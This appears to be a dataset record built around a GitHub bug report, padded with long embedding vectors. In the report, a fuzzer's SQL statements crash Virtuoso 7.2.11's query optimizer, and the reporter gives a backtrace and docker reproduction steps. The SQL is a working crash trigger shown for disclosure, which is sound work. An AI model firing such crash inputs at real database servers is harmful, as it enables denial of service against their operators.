0.010236340574920177, -0.0115422448143363, -0.013050928711891174, -0.011939694173634052, -0.007875979878008366, -0.007125693839043379, -0.002530696103349328, 0.00773808965459466, 0.013480822555720806, -0.011031239293515682, 0.007093248888850212, 0.04026402160525322, 0.004043435677886009, 0.036532867699861526, 0.0015826988965272903, -0.001787506858818233, -0.011745025403797626, 0.0011092072818428278, 0.00573462201282382, 0.021997587755322456, -0.01756886951625347, -0.015005729161202908, -0.01328615378588438, -0.017925763502717018, 0.0025590851437300444, 0.016838861629366875, 0.00190207757987082, 0.02005089819431305, 0.017893318086862564, -0.0041894372552633286, -0.006099626421928406, -0.004951890558004379, 0.029735678806900978, 0.00859787780791521, -0.002102829981595278, -0.014097274281084538, 0.00764481071382761, -0.013918828219175339, -0.008581655099987984, 0.005929290782660246, -0.01787709631025791, -0.00018541708413977176, -0.005012724548578262, -0.030644133687019348, -0.002009551040828228, -0.013570046052336693, 0.009011548943817616, 0.0006514311535283923, 0.01672530546784401, -0.019272223114967346, 0.02217603474855423, 0.027756543830037117, -0.007559643127024174, -0.021462248638272285, -0.03393728286027908, 0.02097557671368122, -0.005953624378889799, 0.009181884117424488, -0.007437975145876408, 0.003189731389284134, 0.004152936860918999, -0.0019710229244083166, -0.014275721274316311, -0.004740999545902014, 0.00658629834651947, 0.0022386927157640457, 0.040620915591716766, 0.009198106825351715, 0.02376583032310009, 0.002820671536028385, -0.02944367378950119, -0.005904957186430693, -0.007742145098745823, -0.017001086845993996, 0.005341228563338518, -0.021510915830731392, 0.007287917658686638, 0.00577112240716815, 0.005535897333174944, 0.022078700363636017, 0.013383488170802593, 0.010390453971922398, -0.006063126027584076, 0.008614099584519863, -0.013318599201738834, -0.0052114492282271385, -0.007125693839043379, 0.007847591303288937, 0.005065447650849819, -0.012507478706538677, -0.021381136029958725, -0.005592675879597664, 0.0067444671876728535, 0.005280394572764635, 0.009855113923549652, 0.010203896090388298, 0.03604619577527046, 0.008354540914297104, -0.0009434345411136746, 0.006371351424604654, 0.007442030590027571, 0.012288475409150124, -0.03740887716412544, -0.00923866219818592, 0.016676638275384903, 0.003536485368385911, 0.0117288026958704, 0.003278954653069377, 0.021381136029958725, 0.024463394656777382, -0.009546888060867786, 0.015492402017116547, 0.00041291103116236627, 0.0019821757450699806, 0.00014980381820350885, -0.010203896090388298, 0.00380415515974164, 0.0009378580725751817, 0.0035020129289478064, -0.027659209445118904, -0.00005547937689698301, -0.008468098007142544, 0.0058806235902011395, 0.012621034868061543, 0.008038204163312912, -0.01060134544968605, -0.007677255664020777, 0.03035212866961956, 0.0034918738529086113, -0.010366120375692844, 0.0041894372552633286, 0.00935221929103136, -0.007109471131116152, -0.01802309788763523, 0.014835393987596035, 0.0005464924615807831, -0.017812207341194153, 0.009968671016395092, 0.004943779669702053, 0.03111458197236061, -0.005892790388315916, -0.004197548609226942, 0.005483174696564674, 0.0013697798131033778, -0.013675492256879807, 0.019320890307426453, -0.006671466398984194, -0.0019233694765716791, -0.008005759678781033, -0.013537601567804813, 0.01446227915585041, 0.0070810820907354355, 0.008459987118840218, -0.022500483319163322, 0.008573544211685658, -0.006436241324990988, -0.0034310398623347282, 0.005223616026341915, -0.035851527005434036, 0.004173215012997389, -0.0071824719198048115, 0.0033641222398728132, -0.004724776837974787, -0.025160958990454674, -0.015954740345478058, -0.0012470977380871773, 0.006634966004639864, -0.010244452394545078, -0.013148263096809387, 0.013797160238027573, 0.029330117627978325, -0.03624086454510689, -0.004025185480713844, 0.028048546984791756, 0.015232843346893787, -0.003134980797767639, 0.012783259153366089, 0.0007888146792538464, -0.016181854531168938, -0.008524877019226551, -0.009027771651744843, -0.0019172860775142908, 0.014624502509832382, 0.004205659963190556, -0.018590882420539856, -0.0010950126452371478, -0.007815145887434483, 0.005633232183754444, -0.0020967465825378895, -0.024057835340499878, 0.011493577621877193, -0.011371909640729427, 0.02603696845471859, -0.00786786898970604, -0.025988301262259483, -0.0045382194221019745, -0.010504011064767838, 0.015005729161202908, 0.014097274281084538, -0.03233126178383827, -0.0037169598508626223, 0.029849234968423843, 0.007616421673446894, 0.034813292324543, -0.014989507384598255, -0.00010544566612225026, 0.012426366098225117, 0.017163310199975967, 0.007194638717919588, -0.017309311777353287, 0.0012065417831763625, -0.023895610123872757, 0.006083403714001179, 0.010179562494158745, 0.0019750783685594797, -0.014616391621530056, 0.01041478756815195, 0.006602521054446697, -0.003593263914808631, 0.009327885694801807, 0.013261820189654827, 0.01468128152191639, -0.0189315527677536, -0.005207393784075975, 0.0029687010683119297, -0.004416550975292921, 0.006111793220043182, -0.006639021448791027, 0.013278042897582054, 0.00975777953863144, 0.022678930312395096, 0.010009227320551872, -0.01825021207332611, 0.02027801238000393, -0.008167983964085579, -0.0007589046144858003, 0.004079936072230339, 0.005373673513531685, -0.01573573797941208, -0.003925823140889406, -0.005511563736945391, -0.019872453063726425, 0.0053290617652237415, 0.012037028558552265, 0.004209715407341719, -0.018444880843162537, 0.002553001744672656, 0.008395097218453884, -0.016554970294237137, -0.0026118080131709576, 0.07501242309808731, 0.005174948833882809, -0.017536425963044167, -0.005580509081482887, 0.00474911043420434, -0.021170245483517647, 0.005183060187846422, 0.0544748529791832, -0.0021433860529214144, 0.02029423601925373, 0.017990652471780777, -0.0017104503931477666, -0.00668363319709897, 0.004343550186604261, 0.004891056567430496, 0.00957122165709734, 0.019239777699112892, -0.02597207948565483, -0.019856229424476624, 0.009944337420165539, 0.00957122165709734, -0.01596285216510296, 0.005020835902541876, 0.0034371232613921165, -0.00787192489951849, -0.014291943050920963, -0.022224701941013336, 0.0019010637188330293, -0.0026584474835544825, 0.030838802456855774, -0.008768212981522083, -0.024122724309563637, 0.005041114054620266, 0.020391570404171944, 0.02240314893424511, 0.01726064458489418, -0.002727392828091979, 0.0007224042201414704, 0.01870443858206272, 0.022500483319163322, -0.004590942058712244, 0.01041478756815195, 0.026053190231323242, -0.012442588806152344, 0.02967078797519207, -0.0026665586046874523, 0.016522524878382683, -0.015005729161202908, -0.012548034079372883, -0.02240314893424511, -0.013797160238027573, -0.0018817995442077518, -0.007843535393476486, 0.016676638275384903, -0.00991189293563366, 0.008695212192833424, 0.023344049230217934, 0.017017308622598648, -0.013018484227359295, 0.016376523301005363, -0.010422898456454277, -0.003017368260771036, 0.015330177731812, 0.017082197591662407, -0.02822699397802353, -0.000309239694615826, 0.007786756847053766, -0.000008325075214088429, -0.021819142624735832, -0.000379959266865626, 0.0008866561111062765, -0.010942015796899796, 0.01510306354612112, 0.002619919367134571, 0.016773972660303116, 0.006424074526876211, 0.02384694293141365, 0.010090338997542858, -0.003199870465323329, -0.0009723306866362691, -0.006188849452883005, 0.02512851357460022, -0.0408804751932621, 0.010285007767379284, -0.01755264773964882, -0.004505774471908808, -0.007563698571175337, -0.015127397142350674, 0.006651188246905804, -0.005170893389731646, 0.005961735732853413, -0.010877125896513462, -0.027350984513759613, -0.009709112346172333, -0.017001086845993996, 0.0070405262522399426, 0.016546858474612236, 0.0012917093699797988, 0.01245069969445467, 0.0020247595384716988, 0.0006488963845185935, 0.0007264597807079554, -0.0030153405386954546, 0.00575084425508976, -0.010001115500926971, 0.02428494766354561, 0.011201574467122555, 0.018282655626535416, -0.009595555253326893, -0.0024617507588118315, 0.004546330310404301, -0.0027983656618744135, 0.0028612276073545218, -0.004724776837974787, 0.012556145898997784, -0.023490050807595253, 0.0170335303992033, 0.006144237704575062, 0.010650012642145157, 0.006095570512115955, -0.00592117989435792, -0.0041286032646894455, 0.011055572889745235, -0.0007913494482636452, -0.01184235978871584, 0.012004583142697811, 0.016400856897234917, 0.00480588898062706, -0.0016131158918142319, 0.02105668932199478, 0.008005759678781033, 0.008678989484906197, 0.005929290782660246, -0.013278042897582054, 0.017276866361498833, 0.031893257051706314, 0.008459987118840218, 0.018071765080094337, 0.014486612752079964, 0.007373085245490074, 0.0035770414397120476, 0.015597847290337086, 0.01241014339029789, -0.0015076702693477273, 0.010463454760611057, 0.0074339197017252445, -0.0019456753507256508, -0.00575084425508976, 0.00771781150251627, -0.011079906485974789, -0.002534751547500491, -0.018590882420539856, 0.01365926954895258, 0.01142868772149086, 0.012653480283915997, -0.0044043841771781445, -0.015062508173286915, 0.007729978300631046, 0.0113556869328022, 0.00900343805551529, -0.01464072521775961, 0.004542274866253138, 0.004895112477242947, 0.005207393784075975, 0.021819142624735832, -0.009522554464638233, 0.0012237781193107367, 0.004911334719508886, 0.006634966004639864, -0.012426366098225117, 0.005982013884931803, 0.01263725757598877, 0.005742733366787434, -0.0019395919516682625, -0.003499984974041581, -0.005418284796178341, 0.0013363210018724203, -0.022224701941013336, -0.02482028678059578, -0.015054396353662014, -0.01936955749988556, 0.018866663798689842, 0.010228229686617851, 0.05823845416307449, -0.0014559613773599267, 0.011258352547883987, -0.00588467950001359, 0.01365926954895258, -0.004138742573559284, -0.006833690218627453, -0.0020328708924353123, 0.02663719840347767, -0.0062902397476136684, -0.000999199110083282, -0.0004712103109341115, 0.018558437004685402, 0.01748775877058506, 0.02027801238000393, 0.002820671536028385, 0.006521408911794424, 0.01672530546784401, 0.00877632386982441, 0.0010159284574910998, 0.005669732578098774, 0.022208480164408684, 0.011639579199254513, 0.018152877688407898, 0.005126281641423702, -0.019888674840331078, -0.010885237716138363, 0.002277220832183957 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. It can also be reproduced in the beta docker image. ```SQL CREATE TABLE v0 ( v1 FLOAT ) ; CREATE VIEW v2 AS SELECT * FROM v0 WHERE v1 IN ( SELECT * FROM v0 WHERE v1 IN ( 'x' ) ORDER BY v1 , v1 / 61 ) ORDER BY v1 ; UPDATE v0 SET v1 = ( SELECT v1 FROM v2 WHERE v1 / ( CASE WHEN v1 NOT IN ( 127 ) AND ( ( -1 , -1 ) , ( -1 , 30 ) ) THEN ( SELECT * FROM v2 WHERE ( SELECT v1 , v1 FROM v0 WHERE v1 = ( 15895325.000000 , 12364601.000000 ) / CASE 54 WHEN NULL THEN -128 END AND v1 = 36 ) ) ELSE v1 + -1 END ) ) + 16 + 67880893.000000 ; ``` backtrace: ```c #0 0x6e7020 (dfe_inx_op_col_def_table+0xa0) #1 0x6e7bbc (sqlo_place_col+0x19c) #2 0x6e5700 (sqlo_place_exp+0x550) #3 0x70bb09 (sqlo_layout_1+0x17f9) #4 0x70ad2c (sqlo_layout_1+0xa1c) #5 0x6eadab (sqlo_layout+0x5fb) #6 0x6e66f0 (sqlo_place_exp+0x1540) #7 0x6eb681 (sqlo_pred_body+0x241) #8 0x6eb906 (sqlo_pred_body+0x4c6) #9 0x6f7561 (sqlo_tb_col_preds+0x14b1) #10 0x70193e (sqlo_place_table+0x104e) #11 0x70967b (sqlo_try+0xdb) #12 0x70ac5c (sqlo_layout_1+0x94c) #13 0x6eadab (sqlo_layout+0x5fb) #14 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #15 0x6ef5d5 (sqlo_place_dt+0x305) #16 0x701485 (sqlo_place_table+0xb95) #17 0x70967b (sqlo_try+0xdb) #18 0x70ac5c (sqlo_layout_1+0x94c) #19 0x6eadab (sqlo_layout+0x5fb) #20 0x6e66f0 (sqlo_place_exp+0x1540) #21 0x6e5dc3 (sqlo_place_exp+0xc13) #22 0x6e5444 (sqlo_place_exp+0x294) #23 0x6eb681 (sqlo_pred_body+0x241) #24 0x6eb906 (sqlo_pred_body+0x4c6) #25 0x6f7561 (sqlo_tb_col_preds+0x14b1) #26 0x70193e (sqlo_place_table+0x104e) #27 0x704c08 (sqlo_try_in_loop+0x6c8) #28 0x7097fc (sqlo_try+0x25c) #29 0x70ac5c (sqlo_layout_1+0x94c) #30 0x6eadab (sqlo_layout+0x5fb) #31 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #32 0x6ef5d5 (sqlo_place_dt+0x305) #33 0x701485 (sqlo_place_table+0xb95) #34 0x70967b (sqlo_try+0xdb) #35 0x70ac5c (sqlo_layout_1+0x94c) #36 0x6eadab (sqlo_layout+0x5fb) #37 0x6e66f0 (sqlo_place_exp+0x1540) #38 0x6e542b (sqlo_place_exp+0x27b) #39 0x6e542b (sqlo_place_exp+0x27b) #40 0x70bb09 (sqlo_layout_1+0x17f9) #41 0x70ad2c (sqlo_layout_1+0xa1c) #42 0x6eadab (sqlo_layout+0x5fb) #43 0x70eb45 (sqlo_top_2+0x335) #44 0x70e465 (sqlo_top_1+0xf5) #45 0x7101b1 (sqlo_query_spec+0x1a1) #46 0x7e0258 (sqlc_update_searched+0x548) #47 0x6b9ac2 (sql_stmt_comp+0x812) #48 0x6bc9d2 (sql_compile_1+0x1a62) #49 0x7cba60 (stmt_set_query+0x340) #50 0x7cd952 (sf_sql_execute+0x922) #51 0x7cecde (sf_sql_execute_w+0x17e) #52 0x7d799d (sf_sql_execute_wrapper+0x3d) #53 0xe214bc (future_wrapper+0x3fc) #54 0xe28dbe (_thread_boot+0x11e) #55 0x7f0f387dd609 (start_thread+0xd9) #56 0x7f0f385ad133 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ```
Fuzzer: Virtuoso 7.2.11 crashed at `dfe_inx_op_col_def_table`
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1191/comments
1
2023-11-28T18:14:55
2023-12-01T16:12:32Z
https://github.com/openlink/virtuoso-opensource/issues/1191
2,015,027,603
1,191
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : Fuzzer: Virtuoso 7.2.11 crashed at `dfe_inx_op_col_def_table` Issue date: --- start body --- The PoC is generated by my DBMS fuzzer. It can also be reproduced in the beta docker image. ```SQL CREATE TABLE v0 ( v1 FLOAT ) ; CREATE VIEW v2 AS SELECT * FROM v0 WHERE v1 IN ( SELECT * FROM v0 WHERE v1 IN ( 'x' ) ORDER BY v1 , v1 / 61 ) ORDER BY v1 ; UPDATE v0 SET v1 = ( SELECT v1 FROM v2 WHERE v1 / ( CASE WHEN v1 NOT IN ( 127 ) AND ( ( -1 , -1 ) , ( -1 , 30 ) ) THEN ( SELECT * FROM v2 WHERE ( SELECT v1 , v1 FROM v0 WHERE v1 = ( 15895325.000000 , 12364601.000000 ) / CASE 54 WHEN NULL THEN -128 END AND v1 = 36 ) ) ELSE v1 + -1 END ) ) + 16 + 67880893.000000 ; ``` backtrace: ```c #0 0x6e7020 (dfe_inx_op_col_def_table+0xa0) #1 0x6e7bbc (sqlo_place_col+0x19c) #2 0x6e5700 (sqlo_place_exp+0x550) #3 0x70bb09 (sqlo_layout_1+0x17f9) #4 0x70ad2c (sqlo_layout_1+0xa1c) #5 0x6eadab (sqlo_layout+0x5fb) #6 0x6e66f0 (sqlo_place_exp+0x1540) #7 0x6eb681 (sqlo_pred_body+0x241) #8 0x6eb906 (sqlo_pred_body+0x4c6) #9 0x6f7561 (sqlo_tb_col_preds+0x14b1) #10 0x70193e (sqlo_place_table+0x104e) #11 0x70967b (sqlo_try+0xdb) #12 0x70ac5c (sqlo_layout_1+0x94c) #13 0x6eadab (sqlo_layout+0x5fb) #14 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #15 0x6ef5d5 (sqlo_place_dt+0x305) #16 0x701485 (sqlo_place_table+0xb95) #17 0x70967b (sqlo_try+0xdb) #18 0x70ac5c (sqlo_layout_1+0x94c) #19 0x6eadab (sqlo_layout+0x5fb) #20 0x6e66f0 (sqlo_place_exp+0x1540) #21 0x6e5dc3 (sqlo_place_exp+0xc13) #22 0x6e5444 (sqlo_place_exp+0x294) #23 0x6eb681 (sqlo_pred_body+0x241) #24 0x6eb906 (sqlo_pred_body+0x4c6) #25 0x6f7561 (sqlo_tb_col_preds+0x14b1) #26 0x70193e (sqlo_place_table+0x104e) #27 0x704c08 (sqlo_try_in_loop+0x6c8) #28 0x7097fc (sqlo_try+0x25c) #29 0x70ac5c (sqlo_layout_1+0x94c) #30 0x6eadab (sqlo_layout+0x5fb) #31 0x6edb6f (sqlo_place_dt_leaf+0xfdf) #32 0x6ef5d5 (sqlo_place_dt+0x305) #33 0x701485 (sqlo_place_table+0xb95) #34 0x70967b (sqlo_try+0xdb) #35 0x70ac5c (sqlo_layout_1+0x94c) #36 0x6eadab (sqlo_layout+0x5fb) #37 0x6e66f0 (sqlo_place_exp+0x1540) #38 0x6e542b (sqlo_place_exp+0x27b) #39 0x6e542b (sqlo_place_exp+0x27b) #40 0x70bb09 (sqlo_layout_1+0x17f9) #41 0x70ad2c (sqlo_layout_1+0xa1c) #42 0x6eadab (sqlo_layout+0x5fb) #43 0x70eb45 (sqlo_top_2+0x335) #44 0x70e465 (sqlo_top_1+0xf5) #45 0x7101b1 (sqlo_query_spec+0x1a1) #46 0x7e0258 (sqlc_update_searched+0x548) #47 0x6b9ac2 (sql_stmt_comp+0x812) #48 0x6bc9d2 (sql_compile_1+0x1a62) #49 0x7cba60 (stmt_set_query+0x340) #50 0x7cd952 (sf_sql_execute+0x922) #51 0x7cecde (sf_sql_execute_w+0x17e) #52 0x7d799d (sf_sql_execute_wrapper+0x3d) #53 0xe214bc (future_wrapper+0x3fc) #54 0xe28dbe (_thread_boot+0x11e) #55 0x7f0f387dd609 (start_thread+0xd9) #56 0x7f0f385ad133 (clone+0x43) ``` ways to reproduce (write poc to the file /tmp/test.sql first): ```bash # remove the old one docker container rm virtdb_test -f # start virtuoso through docker docker run --name virtdb_test -itd --env DBA_PASSWORD=dba pkleef/virtuoso-opensource-7 # wait the server starting sleep 10 # check whether the simple query works echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba # run the poc cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba ``` --- end body ---
3,355
[ -0.026232127100229263, 0.0010271189967170358, -0.009240541607141495, -0.0038084585685282946, 0.04924524202942848, 0.027107471600174904, -0.022998996078968048, 0.02580857276916504, -0.005689745303243399, 0.029564086347818375, -0.007539265789091587, -0.0048849922604858875, 0.008322840556502342, 0.000296708574751392, -0.01117477286607027, 0.033263128250837326, -0.02336607687175274, 0.01955408789217472, -0.05043119192123413, -0.036199770867824554, 0.0014409668510779738, 0.02497558295726776, -0.021248305216431618, 0.043174296617507935, -0.013553735800087452, 0.006794515997171402, 0.0005784162785857916, -0.0016818633303046227, -0.0002210423699580133, 0.018918756395578384, 0.01281251572072506, 0.03571974113583565, 0.0011091827182099223, -0.004101417027413845, 0.050487667322158813, 0.004337901249527931, 0.03264191374182701, 0.029451139271259308, 0.006589798256754875, 0.03560679405927658, 0.01387140154838562, -0.034279655665159225, -0.008788750506937504, 0.0586199089884758, -0.009254660457372665, 0.01438672561198473, -0.0038684620521962643, -0.008859342895448208, -0.04331548139452934, 0.025003818795084953, 0.000931819318793714, -0.006593327969312668, -0.01257250178605318, -0.043908458203077316, -0.011880696751177311, -0.047381602227687836, 0.01935642957687378, 0.02967703528702259, 0.02127654105424881, 0.014196126721799374, -0.01883404515683651, -0.02928171679377556, 0.012177184224128723, 0.03055237978696823, 0.0011727157980203629, 0.0547514446079731, -0.006272132508456707, -0.001020059804432094, -0.039334069937467575, 0.0198788121342659, -0.018961111083626747, -0.03710335120558739, 0.020852986723184586, 0.03456202521920204, 0.021869517862796783, 0.001621859846636653, 0.010278250090777874, -0.0012680154759436846, -0.026203889399766922, -0.007151007652282715, -0.034279655665159225, 0.03450555354356766, -0.05009235069155693, 0.03171009570360184, 0.0144008444622159, -0.0003152390709146857, -0.04978174343705177, -0.07556207478046417, -0.02284369245171547, -0.023831985890865326, -0.0070380596444010735, 0.005146184004843235, -0.00828754436224699, 0.01465497724711895, 0.013045471161603928, -0.009720570407807827, -0.043343719094991684, -0.0006181244971230626, -0.055062051862478256, 0.054017286747694016, -0.025582676753401756, -0.0034890281967818737, 0.03436436876654625, 0.01588328368961811, 0.02514500357210636, 0.017690449953079224, -0.0023242540191859007, 0.004090827889740467, 0.04148007929325104, 0.14717097580432892, 0.030637091025710106, -0.01677274890244007, -0.03159714862704277, -0.0030301776714622974, 0.010581796988844872, -0.0341949462890625, 0.03783751279115677, -0.003099005203694105, -0.0485110804438591, -0.04190363362431526, -0.024297894909977913, -0.027008643373847008, -0.016815103590488434, -0.02213776856660843, -0.031512435525655746, 0.024043763056397438, -0.014894991181790829, -0.03106064535677433, -0.026090942323207855, -0.01694216951727867, 0.008054589852690697, -0.055570319294929504, 0.001974821789190173, -0.023126062005758286, 0.03142772614955902, -0.008160478435456753, -0.023479023948311806, 0.012981937266886234, 0.010878285393118858, 0.007715746760368347, -0.06037059798836708, -0.02388845942914486, 0.00828048586845398, -0.019116414710879326, 0.015247953124344349, 0.016998643055558205, -0.023606089875102043, -0.00633213622495532, 0.0006710687885060906, 0.014527910389006138, 0.008880521170794964, -0.010080590844154358, 0.048736974596977234, 0.01867874152958393, -0.00013754483370576054, -0.009558207355439663, 0.03298075869679451, 0.034816160798072815, 0.02353549748659134, -0.033234890550374985, -0.043174296617507935, -0.043343719094991684, -0.002027766080573201, -0.04975350573658943, 0.00649449834600091, 0.010800633579492569, 0.013963171280920506, 0.03594563901424408, -0.0029295836575329304, 0.004337901249527931, -0.0006675391341559589, 0.012516028247773647, 0.0070557077415287495, 0.033771391957998276, -0.03334783762693405, 0.02685333974659443, 0.018001055344939232, 0.00801223423331976, -0.018608149141073227, -0.030975934118032455, -0.02614741586148739, 0.012819575145840645, -0.008569913916289806, -0.016970407217741013, 0.031851280480623245, 0.010786514729261398, 0.0390799380838871, -0.005926229991018772, 0.029197005555033684, 0.00017041440878529102, 0.018608149141073227, -0.002821930218487978, 0.004267308861017227, -0.004104946739971638, -0.0002070342015940696, -0.011167713440954685, -0.04080239310860634, -0.0009335841750726104, -0.013984349556267262, -0.029902929440140724, 0.014146711677312851, -0.03800693526864052, -0.034787923097610474, -0.015163241885602474, -0.011675979010760784, 0.047353364527225494, 0.011266542598605156, 0.04845460504293442, 0.031512435525655746, -0.01585504785180092, 0.009099356830120087, 0.012537205591797829, 0.015840929001569748, 0.029394665732979774, -0.04503793641924858, 0.011951289139688015, -0.026090942323207855, 0.0076945689506828785, -0.03885404393076897, -0.002237778389826417, 0.019116414710879326, -0.01011588703840971, -0.012240718118846416, -0.002011882606893778, -0.06313782185316086, -0.04724041745066643, 0.0054426719434559345, -0.01989293098449707, -0.04811576381325722, 0.012600738555192947, 0.026825102046132088, -0.015770336613059044, -0.016857458278536797, -0.001441849279217422, 0.03125830367207527, 0.0035702092573046684, -0.009593503549695015, -0.0012865460012108088, 0.03312194347381592, -0.012332487851381302, 0.06087886542081833, 0.018452847376465797, -0.022250715643167496, -0.010285308584570885, 0.011146536096930504, 0.05387610197067261, -0.035691503435373306, 0.005396787077188492, 0.001111829886212945, -0.0006397434044629335, -0.015473848208785057, -0.04105652496218681, 0.0027742802631109953, 0.0002358226483920589, 0.02353549748659134, 0.003273721318691969, 0.02579445391893387, 0.01780339702963829, -0.01691393367946148, -0.019582325592637062, 0.009120535105466843, -0.00024111708626151085, -0.0009512322722002864, 0.009141712449491024, 0.019991761073470116, 0.019229363650083542, -0.026966286823153496, -0.0077369241043925285, -0.009099356830120087, -0.006872167810797691, 0.033234890550374985, 0.017690449953079224, -0.015925640240311623, -0.04774868115782738, 0.014909109100699425, -0.02162950299680233, -0.01622212864458561, 0.008322840556502342, 0.008619328960776329, -0.012212480418384075, 0.014697332866489887, -0.010228835046291351, -0.004553208127617836, 0.03475968539714813, 0.034787923097610474, 0.01403376366943121, 0.025893284007906914, -0.01316547766327858, -0.01464085839688778, -0.03797869756817818, -0.032698389142751694, -0.01760573871433735, -0.04097181558609009, -0.0035684446338564157, -0.01142890565097332, 0.02788398787379265, 0.021375371143221855, 0.01953996904194355, 0.0054956162348389626, 0.005703863687813282, -0.030637091025710106, -0.027163945138454437, 0.00880992878228426, 0.03625624254345894, -0.07601387053728104, -0.024396724998950958, -0.005943878088146448, 0.0162503644824028, -0.00792752392590046, -0.0162503644824028, -0.007539265789091587, -0.020852986723184586, -0.012946642003953457, -0.011986585333943367, -0.015657389536499977, 0.0024036704562604427, 0.013913757167756557, -0.026203889399766922, -0.023464905098080635, -0.004179068375378847, -0.0446426160633564, -0.01973762735724449, -0.09369020164012909, 0.006547442637383938, 0.06246013194322586, -0.020189419388771057, -0.01898934878408909, 0.02322489209473133, -0.06934995204210281, 0.015742098912596703, 0.03227483481168747, -0.04653449356555939, -0.009191127493977547, 0.0021283600945025682, -0.015332663431763649, -0.05684097856283188, -0.014909109100699425, -0.012706627137959003, -0.0007478379993699491, 0.007362784817814827, -0.017732804641127586, 0.03803517296910286, -0.023662563413381577, -0.008308722637593746, 0.006346254609525204, 0.01509264949709177, 0.04122594743967056, -0.033065468072891235, 0.03868462145328522, -0.003099005203694105, 0.0008934347424656153, 0.050515905022621155, -0.02530030719935894, 0.02302723191678524, 0.04557443782687187, -0.03021353669464588, -0.018551675602793694, -0.021770687773823738, 0.02144596353173256, 0.015544440597295761, 0.01421024464070797, -0.008951113559305668, 0.0047543966211378574, 0.021587148308753967, -0.006868638098239899, -0.0017612797673791647, 0.02357785403728485, -0.015629151836037636, 0.010814751498401165, 0.001278604380786419, -0.05822459235787392, 0.04472732916474342, -0.001200070371851325, -0.010539441369473934, -0.01671627350151539, -0.041818924248218536, 0.0400964692234993, -0.002303076209500432, 0.004179068375378847, 0.019398784264922142, -0.017266895622015, -0.015572678297758102, 0.029705271124839783, -0.01221953984349966, 0.0397576242685318, 0.007122770417481661, 0.012156006880104542, 0.02236366458237171, -0.03475968539714813, -0.021897755563259125, 0.0014515557559207082, 0.025949757546186447, -0.04653449356555939, -0.07872461527585983, 0.006681568454951048, -0.009544089436531067, 0.010144123807549477, -0.003730806987732649, 0.007962820120155811, -0.04001175984740257, 0.008033412508666515, 0.009431141428649426, 0.0019465847872197628, -0.003670803504064679, 0.00008090547635219991, 0.022744862362742424, 0.004560267552733421, 0.009120535105466843, 0.02775692194700241, 0.007327488623559475, 0.015191478654742241, -0.03021353669464588, -0.00027928108465857804, 0.018057528883218765, 0.03523971512913704, 0.0394187830388546, 0.003741395892575383, -0.01534678228199482, -0.029705271124839783, 0.021700095385313034, -0.030975934118032455, 0.02600623108446598, 0.009607622399926186, 0.020980054512619972, 0.010991232469677925, 0.024721449241042137, -0.004899110645055771, 0.001701276283711195, 0.01660332642495632, -0.004630859941244125, 0.013193714432418346, -0.008485203608870506, 0.0019448199309408665, -0.0008599033462814987, -0.008951113559305668, -0.0443037748336792, 0.003762573469430208, 0.004659096710383892, 0.004087298642843962, -0.017040999606251717, -0.019667034968733788, 0.022095413878560066, -0.012501909397542477, 0.007743983529508114, -0.02842048928141594, -0.021855399012565613, -0.02981821820139885, -0.000021977391952532344, -0.013363136909902096, 0.000813135935459286, 0.0009424082236364484, 0.021685978397727013, -0.006713334936648607, 0.0002408964792266488, -0.009925288148224354, 0.030637091025710106, -0.0047614555805921555, 0.012756042182445526, 0.05266191065311432, 0.010779455304145813, -0.00566856749355793, 0.03001587837934494, 0.014598502777516842, -0.01326430682092905, 0.031851280480623245, 0.049612320959568024, 0.016857458278536797, -0.020810632035136223, 0.002998411189764738, -0.03628448024392128, 0.008231070823967457, -0.0016200949903577566, -0.017746923491358757, 0.015431493520736694, -0.021841280162334442, 0.019779983907938004, 0.03891051560640335, 0.017139827832579613, -0.016010351479053497, -0.007560443133115768, 0.0027583970222622156, -0.008386374451220036, -0.006692157126963139, -0.0023419021163135767, 0.038148120045661926, 0.012720745988190174, -0.018354017287492752, -0.020471788942813873, -0.027841633185744286, 0.013412551023066044, 0.021502437070012093, -0.014266719110310078, -0.05545736849308014, -0.02374727465212345, 0.0003613447188399732, -0.007715746760368347, -0.029084058478474617, 0.0033284304663538933, 0.02042943239212036, -0.010200598277151585, 0.013405491597950459, -0.026486258953809738, -0.00035009405110031366, -0.004722629673779011, -0.018565794453024864, -0.01708335429430008, 0.0029772333800792694, 0.026288600638508797, 0.01586916670203209, -0.014866754412651062, 0.0070204115472733974, -0.05777280032634735, 0.01274898275732994, -0.02107888273894787, -0.019977642223238945, -0.004740277770906687, 0.01654685288667679, 0.00039267007377929986, 0.0234084315598011, 0.008428729139268398, -0.015600915066897869, -0.03258544206619263, -0.027008643373847008, 0.022730745375156403, 0.038825806230306625, 0.026556851342320442, 0.024368487298488617, -0.0019095237366855145, 0.0042037758976221085, -0.024820279330015182, -0.015996232628822327, 0.011654800735414028, -0.014782043173909187, 0.0446426160633564, -0.008605210110545158, 0.00005109674748382531, 0.02146008238196373, 0.025229714810848236, 0.0012671331642195582, -0.009297016076743603, 0.017549265176057816, 0.044557906687259674, -0.04006823152303696, -0.02911229617893696, 0.021163593977689743, 0.007638094946742058, -0.0169280506670475, 0.021573029458522797, 0.021389489993453026, -0.02671215496957302, 0.024848515167832375, 0.008887579664587975, -0.00845696683973074, -0.008619328960776329, 0.008824046701192856, -0.013603150844573975, -0.0016624503768980503, 0.015953876078128815, 0.0167586300522089, 0.005326194688677788, -0.00784987211227417, -0.011104180477559566, -0.002781339455395937, 0.0038084585685282946, -0.0119583485648036, 0.02109300158917904, -0.006861578673124313, 0.005188539624214172, -0.04252484813332558, 0.002615447388961911, 0.0211353562772274, 0.006843930575996637, -0.025003818795084953, -0.04272250458598137, -0.011619504541158676, 0.00396376196295023, -0.033771391957998276, -0.019991761073470116, -0.0013456671731546521, -0.005174421239644289, 0.04097181558609009, -0.03032648377120495, -0.0019183477852493525, 0.028547557070851326, 0.010892403312027454, -0.011774808168411255, 